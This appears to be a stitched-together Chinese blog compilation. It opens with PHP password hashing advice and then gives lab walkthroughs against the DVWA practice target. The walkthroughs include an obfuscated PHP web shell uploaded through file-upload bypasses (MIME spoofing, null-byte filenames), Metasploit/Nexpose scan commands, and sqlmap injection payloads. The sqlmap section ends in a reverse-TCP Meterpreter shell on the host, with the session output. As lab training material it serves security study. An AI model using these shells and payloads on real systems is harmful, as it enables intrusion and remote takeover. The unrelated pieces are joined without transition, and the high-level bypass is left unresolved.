php 存储用户密码新玩法程序代码

php 存储用户密码有常用的md5与salt的方法了，不过md5好像可以破解了，今天我们要介绍的是php 存储用户密码新玩法，具体的如下。

相信很多人要么是md5()直接存入库或者存储md5()和salt两个字段。但第一种不安全。第二种麻烦。好在php提供了更简单的解决方案。

注：以下的前提条件是在php5.5版本中的

在php5.5以后，可以换一种存法了。简单方便。

<?php
$pwd = "123456";
$hash = password_hash($pwd, PASSWORD_BCRYPT);
echo $hash;

// mysql中就只需要存储这个hash值就行了。建议把数据库该字段值设置为255

if (password_verify($pwd, '数据库中的hash值')) {
    echo "密码正确";
} else { 
    echo "密码错误";
}
看到这时，可能有些人说tm以前我存密码只是单独存了一个md5的password，也没有用salt，现在我想改成你这种，可怎么办好呢。

参考stackoverflow中的这个文章，也许对你有帮助。

http://stackoverflow.com/questions/18906660/converting-md5-password-hashes-to-php-5-5-password-hash

 

$password = $_POST["password"];

// TODO 这里要判断一下这个密码是否是正确密码
// 然后再决定更新

if (substr($pwInDatabase, 0, 1) == "$")
{
    // Password already converted, verify using password_verify
}
else
{
    // User still using the old MD5, update it!

    if (md5($password) == $pwInDatabase)
    {
        $db->storePw(password_hash($password));
    }
}

不推荐图中这种做法，因为double hash不会增加安全性。

DVWA (Dam Vulnerable Web Application)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞，下面我们来看看。

low：
<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}

?>
没有对文件类型进行限制，直接将php文件上传，之后访问：http://localhost/hackable/uploads/XX.php即可。

medium：
<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>
对上传的文件进行限制。
解决方法1：用burp suite进行00截断，将文件名改为1.php .jpg（注意中间有空格）然后在拦截中将空格改为00。
解决方法2：直接上传2.php文件之后进行拦截，数据包如下

POST /vulnerabilities/upload/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/vulnerabilities/upload/
Cookie: PHPSESSID=pgke4molj8bath1fmdh7mvt686; security=medium
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------143381619322555
Content-Length: 549

-----------------------------143381619322555
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000
-----------------------------143381619322555
Content-Disposition: form-data; name="uploaded"; filename="2.php"
Content-Type: application/octet-stream

<?php

$item['wind'] = 'assert';

$array[] = $item;

$array[0]['wind']($_POST['loveautumn']);

?>
-----------------------------143381619322555
Content-Disposition: form-data; name="Upload"

Upload
-----------------------------143381619322555--
将红色的部分修改成：Content-Type: image/jpeg即可绕过。

High：
<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>
对图片的命名和类型进行了严格的限制，那么可以用文件头欺骗的方式来解决这个问题。另外，假设文件名为1.php.png，strrpos会截取.出现的最后位置是5，之后substr从第六位开始重新命名文件名，也就是最终上传的文件名会被改成png，会被拦截掉。
首先使用记事本对正常图片文件编辑，将php一句话代码写到图片最下面，保存。这样就可以欺骗文件类型的检测。
最后对文件名的重命名进行绕过。将文件名改为1.php .png上传，用burpsuite拦截：
Content-Disposition: form-data; name="uploaded"; filename="1.php .png"部分修改为
Content-Disposition: form-data; name="uploaded"; filename="1.php\X00.php .png"的话可以获得一个x00.php .png文件，这个是之前有php任意文件上传漏洞的文章中提到过的。对空格截断无效。目前不知道最终答案，可能是上传一个含有一句话的jpg文件之后采用文件包含来完成？暂时存疑

Metasploit是一个免费的、可下载的框架，通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具

nexpose安装在虚拟机中比较麻烦，所以直接安装到物理机上，kali安装在虚拟机中，执行扫描命令如下：
首先确定是否连接数据库：
msf > db_status
[*] postgresql connected to msf3

确认后
msf > load nexpose
连接后
msf > nexpose_connect loveautumn:pass@192.168.1.8:3780 ok----loveautumn是用户名，pass是密码，192.168.1.8是物理机IP
msf > nexpose_scan 192.168.1.8
[*] Scanning 1 addresses with template pentest-audit in sets of 32

sqlmap 是一个自动SQL 射入工具。它是可胜任执行一个广泛的数据库管理系统后端指印, 检索遥远的DBMS 数据库等，下面我们来看一个学习例子。

自己搭建一个PHP+MYSQL平台，靶场为DVWA，设置SQL注入靶场级别为low（方便测试使用）。
在提交框中输入1，用burp抓包，将包数据复制到cookies.txt文档中，拖到kali环境。
root@kali:~# sqlmap -r "/root/cookies.txt"
返回：
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=-1890' OR 7466=7466#&Submit=Submit
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: id=-6878' OR 1 GROUP BY CONCAT(0x7162626271,(SELECT (CASE WHEN (5403=5403) THEN 1 ELSE 0 END)),0x716b766271,FLOOR(RAND(0)*2)) HAVING MIN(0)#&Submit=Submit
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
    Payload: id=' AND (SELECT * FROM (SELECT(SLEEP(5)))Dgpu)#&Submit=Submit
    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=' UNION ALL SELECT NULL,CONCAT(0x7162626271,0x4c4266596d5953594265,0x716b766271)#&Submit=Submit
---
[13:45:05] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.29, Apache 2.4.10
back-end DBMS: MySQL 5.0.12
[13:45:05] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.8'
 
确定注入点后：
root@kali:~# sqlmap -r "/root/cookies.txt" --os-pwn --msf-path=/opt/metasploit
部分省略
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
> 1（使用metasploit的TCP连接shell）
 
which web application language does the web server support?
[1] ASP (default)
[2] ASPX
[3] JSP
[4] PHP
> 4（PHP的脚本）
 
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2（自定义路径）
please provide a comma separate list of absolute directory paths: D:/WWW/DVWA/（输入绝对路径）
 
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP
[4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS
[5] Bind TCP: Listen on the database host for a connection
> 1（TCP反向连接shell）
what is the local address? [Enter for '192.168.1.104' (detected)]
which local port number do you want to use? [16308]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 1（meterpreter shell）
 
部分省略
PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => process
LPORT => 16308
LHOST => 192.168.1.104
[*] Started reverse handler on 192.168.1.104:16308
[*] Starting the payload handler...
[13:46:43] [INFO] running Metasploit Framework shellcode remotely via shellcodeexec, please wait..
[*] Sending stage (957487 bytes) to 192.168.1.8
[*] Meterpreter session 1 opened (192.168.1.104:16308 -> 192.168.1.8:37639) at 2016-01-17 13:46:45 +0800
meterpreter > Loading extension espia...success.
meterpreter > Loading extension incognito...success.
meterpreter > Computer        : PGOS
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/win32
meterpreter > Server username: PGOS\Administrator
meterpreter >
同时，DVWA目录下会生成一个随机的php上传shell。